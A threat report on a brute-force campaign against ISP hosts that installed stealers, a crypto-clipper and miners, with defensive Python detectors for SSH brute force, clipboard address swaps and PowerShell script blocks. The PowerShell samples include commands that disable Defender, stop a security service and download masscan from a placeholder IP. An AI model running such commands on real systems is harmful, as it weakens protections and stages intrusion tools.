A recent cybersecurity investigation by the Splunk Threat Research Team has uncovered a significant exploitation campaign targeting over 4,000 IP addresses associated with Internet Service Providers (ISPs) on the West Coast of the United States and in China. This campaign involves the deployment of information-stealing malware and cryptocurrency miners on compromised systems.
Attack Methodology
The threat actors initiated their attacks by conducting brute-force attempts to exploit weak credentials, primarily originating from IP addresses linked to Eastern Europe. Upon gaining initial access, they employed PowerShell scripts to deliver various executables designed for network scanning, data theft, and cryptocurrency mining using XMRig. Notably, before executing these payloads, the attackers disabled security features and terminated services that could detect cryptominers, aiming to evade detection.
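The first stage described above, a credential brute force followed by a successful login, is visible in ordinary authentication logs. The following Python example is added here for illustration and is not code from the Splunk Threat Research Team or the report; it runs a sliding-window detector over a constructed sshd-style log excerpt (the IP addresses, usernames and timestamps are synthetic) and flags a source that reaches the failure threshold, recording whether that source then logged in successfully, which is the event that most deserves a response.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd-style log excerpt for this example (not data from the Splunk report).
# 203.0.113.7 tries eight passwords in eight seconds and then logs in; 192.0.2.9 fails
# five times but two minutes apart, which a one-minute window must not flag.
SAMPLE_LOG = """\
2025-03-01T10:00:01 sshd[101]: Failed password for admin from 203.0.113.7 port 50211 ssh2
2025-03-01T10:00:02 sshd[102]: Failed password for root from 203.0.113.7 port 50212 ssh2
2025-03-01T10:00:03 sshd[103]: Failed password for admin from 203.0.113.7 port 50213 ssh2
2025-03-01T10:00:04 sshd[104]: Failed password for invalid user test from 203.0.113.7 port 50214 ssh2
2025-03-01T10:00:05 sshd[105]: Failed password for root from 203.0.113.7 port 50215 ssh2
2025-03-01T10:00:06 sshd[106]: Failed password for admin from 203.0.113.7 port 50216 ssh2
2025-03-01T10:00:07 sshd[107]: Failed password for root from 203.0.113.7 port 50217 ssh2
2025-03-01T10:00:08 sshd[108]: Failed password for admin from 203.0.113.7 port 50218 ssh2
2025-03-01T10:00:09 sshd[109]: Accepted password for admin from 203.0.113.7 port 50219 ssh2
2025-03-01T10:05:00 sshd[110]: Accepted publickey for ops from 198.51.100.5 port 40000 ssh2
2025-03-01T10:06:00 sshd[111]: Failed password for ops from 198.51.100.5 port 40001 ssh2
2025-03-01T10:10:00 sshd[112]: Failed password for admin from 192.0.2.9 port 41000 ssh2
2025-03-01T10:12:00 sshd[113]: Failed password for admin from 192.0.2.9 port 41001 ssh2
2025-03-01T10:14:00 sshd[114]: Failed password for admin from 192.0.2.9 port 41002 ssh2
2025-03-01T10:16:00 sshd[115]: Failed password for admin from 192.0.2.9 port 41003 ssh2
2025-03-01T10:18:00 sshd[116]: Failed password for admin from 192.0.2.9 port 41004 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) (?:password|publickey) "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Flag sources that reach `threshold` failed logins inside a sliding `window`.

    Returns {src_ip: {"failures": total_failures, "users": set_of_usernames,
    "success_after_failures": bool}}. The last field is the signal that matters most:
    a successful login from a source that was just brute-forcing is a likely compromise.
    """
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    total = defaultdict(int)      # src -> all failures seen
    users = defaultdict(set)      # src -> usernames tried
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src = datetime.fromisoformat(m["ts"]), m["src"]
        q = recent[src]
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if m["result"] == "Failed":
            q.append(ts)
            total[src] += 1
            users[src].add(m["user"])
            if len(q) >= threshold:
                alert = alerts.setdefault(src, {"users": users[src],
                                                "success_after_failures": False})
                alert["failures"] = total[src]
        elif src in alerts and q:         # login succeeded while the source is still hot
            alerts[src]["success_after_failures"] = True
    return alerts


if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG).items():
        print(src, info)
```

The window and threshold are deliberately low so the constructed sample trips them; on a real ISP edge host they should be tuned against the baseline rate of failed logins, and a source that is flagged and then accepted is the one to isolate and investigate first.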
Capabilities of the Malware
The deployed stealer malware possesses functionalities beyond standard data theft. It can capture screenshots and operates similarly to clipper malware by monitoring clipboard content for cryptocurrency wallet addresses, specifically targeting Bitcoin (BTC), Ethereum (ETH), Binance Chain BEP2 (ETHBEP2), Litecoin (LTC), and TRON (TRX). The stolen information is then exfiltrated to a Telegram bot controlled by the attackers.
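The clipper behaviour described above leaves a characteristic trace: the clipboard holds a wallet address, and a fraction of a second later it holds a different address of the same coin, far faster than a person copies a second address. The following Python example is added here for illustration and is not code from the report; it classifies clipboard text by the address formats of the coins named above (shape only, no checksum validation) and flags that same-coin, different-address rewrite in a constructed clipboard history (the addresses are synthetic, not real wallets). The `max_gap` threshold and the event format are assumptions of the example.

```python
import re
from datetime import datetime, timedelta

# Address-format patterns for the coins the stealer watches for. Written for this example
# from the public address formats; they check shape only, not checksums.
WALLET_PATTERNS = {
    "BTC": re.compile(r"^(?:bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "ETHBEP2": re.compile(r"^bnb1[ac-hj-np-z02-9]{38}$"),
    "LTC": re.compile(r"^(?:ltc1[ac-hj-np-z02-9]{25,62}|[LM][a-km-zA-HJ-NP-Z1-9]{26,33})$"),
    "TRX": re.compile(r"^T[a-km-zA-HJ-NP-Z1-9]{33}$"),
}


def classify_wallet(text):
    """Return the coin whose address format `text` matches, or None."""
    text = text.strip()
    for coin, pattern in WALLET_PATTERNS.items():
        if pattern.match(text):
            return coin
    return None


def detect_clipboard_swaps(events, max_gap=timedelta(seconds=2)):
    """Flag the clipper signature in a recorded clipboard history.

    `events` is a list of (timestamp, clipboard_text). A person copies a new address
    seconds or minutes apart; a clipper rewrites the clipboard right after the user's copy,
    so a same-coin, different-address change inside `max_gap` is suspicious.
    """
    alerts = []
    prev_ts = prev_text = prev_coin = None
    for ts, text in events:
        coin = classify_wallet(text)
        if (coin is not None and coin == prev_coin and text != prev_text
                and ts - prev_ts <= max_gap):
            alerts.append({"coin": coin, "original": prev_text,
                           "replacement": text, "at": ts})
        prev_ts, prev_text, prev_coin = ts, text, coin
    return alerts


# Constructed clipboard history (addresses are synthetic and not real wallets).
T0 = datetime(2025, 3, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    (T0, "meeting notes"),
    (T0 + timedelta(seconds=10), "0x" + "ab" * 20),     # user copies an ETH address
    (T0 + timedelta(seconds=10.3), "0x" + "cd" * 20),   # rewritten 300 ms later: swap
    (T0 + timedelta(seconds=60), "1" + "A" * 33),       # user copies a BTC address
    (T0 + timedelta(seconds=120), "1" + "B" * 33),      # another BTC address a minute later
    (T0 + timedelta(seconds=180), "T" + "A" * 33),      # TRX address
    (T0 + timedelta(seconds=180.5), "T" + "A" * 33),    # same text re-copied: not a swap
]

if __name__ == "__main__":
    for alert in detect_clipboard_swaps(SAMPLE_EVENTS):
        print(alert)
```

An endpoint agent that records clipboard changes can feed this check directly; for users without such telemetry, the practical mitigation is the same one the detector encodes: compare the pasted address against the one copied before sending funds.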
Tools and Persistence Mechanisms
To maintain persistence and expand their reach within compromised networks, the attackers utilized additional tools:
- Auto.exe: Downloads a password list (pass.txt) and a list of IP addresses (ip.txt) from the command-and-control (C2) server to facilitate further brute-force attacks.
- Masscan.exe: Employs the Masscan tool, enabling the scanning of large numbers of IP addresses to identify open ports and conduct credential brute-force attacks.
These tools allowed the threat actors to systematically target specific CIDR blocks of ISP infrastructure, enhancing their ability to compromise additional systems.
Recommendations for ISPs and Organizations
In light of this sophisticated exploitation campaign, ISPs and organizations are advised to implement the following security measures:
- Enforce Strong Authentication: Implement robust password policies and consider multi-factor authentication (MFA) to mitigate the risk of brute-force attacks exploiting weak credentials.
- Regular Security Audits: Conduct frequent security assessments to identify and remediate vulnerabilities within network infrastructures.
- Monitor for Unauthorized Tools: Deploy security solutions capable of detecting the use of unauthorized tools, such as Masscan, within your network environment.
- Restrict PowerShell Usage: Limit the use of scripting languages like PowerShell to trusted administrators and employ logging to monitor for suspicious activities.
- Stay Informed: Keep abreast of the latest threat intelligence to understand emerging tactics, techniques, and procedures (TTPs) used by adversaries.
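The "Monitor for Unauthorized Tools" and "Restrict PowerShell Usage" recommendations meet in PowerShell script block logging (Event ID 4104), where the download of Masscan, the staging of the brute-force lists and the tampering with security services all leave text behind. The following Python example is added here for illustration and is not code from the Splunk Threat Research Team; it scores constructed script-block events against a small rule set built from the tool and file names this write-up mentions plus generic download-cradle and tampering patterns (the weights, hostnames, paths and the placeholder IP are assumptions of the example).

```python
import re

# Indicator patterns for PowerShell script-block text (Event ID 4104). The tool and file
# names come from this write-up; the cradle, tampering and service-stop patterns and the
# weights are assumptions for the example, not rules published with the report.
RULES = {
    "download_cradle": (1, re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer", re.I)),
    "security_tampering": (3, re.compile(
        r"Set-MpPreference\s+-Disable\w*|Add-MpPreference\s+-ExclusionPath", re.I)),
    "service_stop": (2, re.compile(r"Stop-Service|\bsc(?:\.exe)?\s+stop\b", re.I)),
    "known_tool": (3, re.compile(r"masscan|xmrig|auto\.exe|pass\.txt|ip\.txt", re.I)),
}


def triage_script_blocks(events, min_score=3):
    """Score each script block by the rule categories it matches; return those at or above min_score.

    A lone download is routine administration (score 1) and is not reported; any named
    tool or any tampering with protection is reported on its own.
    """
    findings = []
    for ev in events:
        hits = [name for name, (_, pat) in RULES.items() if pat.search(ev["script"])]
        score = sum(RULES[name][0] for name in hits)
        if score >= min_score:
            findings.append({"id": ev["id"], "host": ev["host"], "score": score, "hits": hits})
    return findings


# Constructed sample events; hosts, paths, service name and the IP are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "host": "edge-01",
     "script": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"id": 2, "host": "edge-01",
     "script": "Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name ExampleEDRService"},
    {"id": 3, "host": "edge-02",
     "script": "Invoke-WebRequest http://203.0.113.10/masscan.exe -OutFile C:\\Users\\Public\\masscan.exe"},
    {"id": 4, "host": "edge-03",
     "script": "Invoke-WebRequest https://updates.example.com/patch.msi -OutFile patch.msi"},
]

if __name__ == "__main__":
    for finding in triage_script_blocks(SAMPLE_EVENTS):
        print(finding)
```

Script block logging has to be enabled before any of this text exists to search, and because the campaign used PowerShell for every delivery step, restricting who may run it and forwarding 4104 events off the host are the two controls that make this triage worth running.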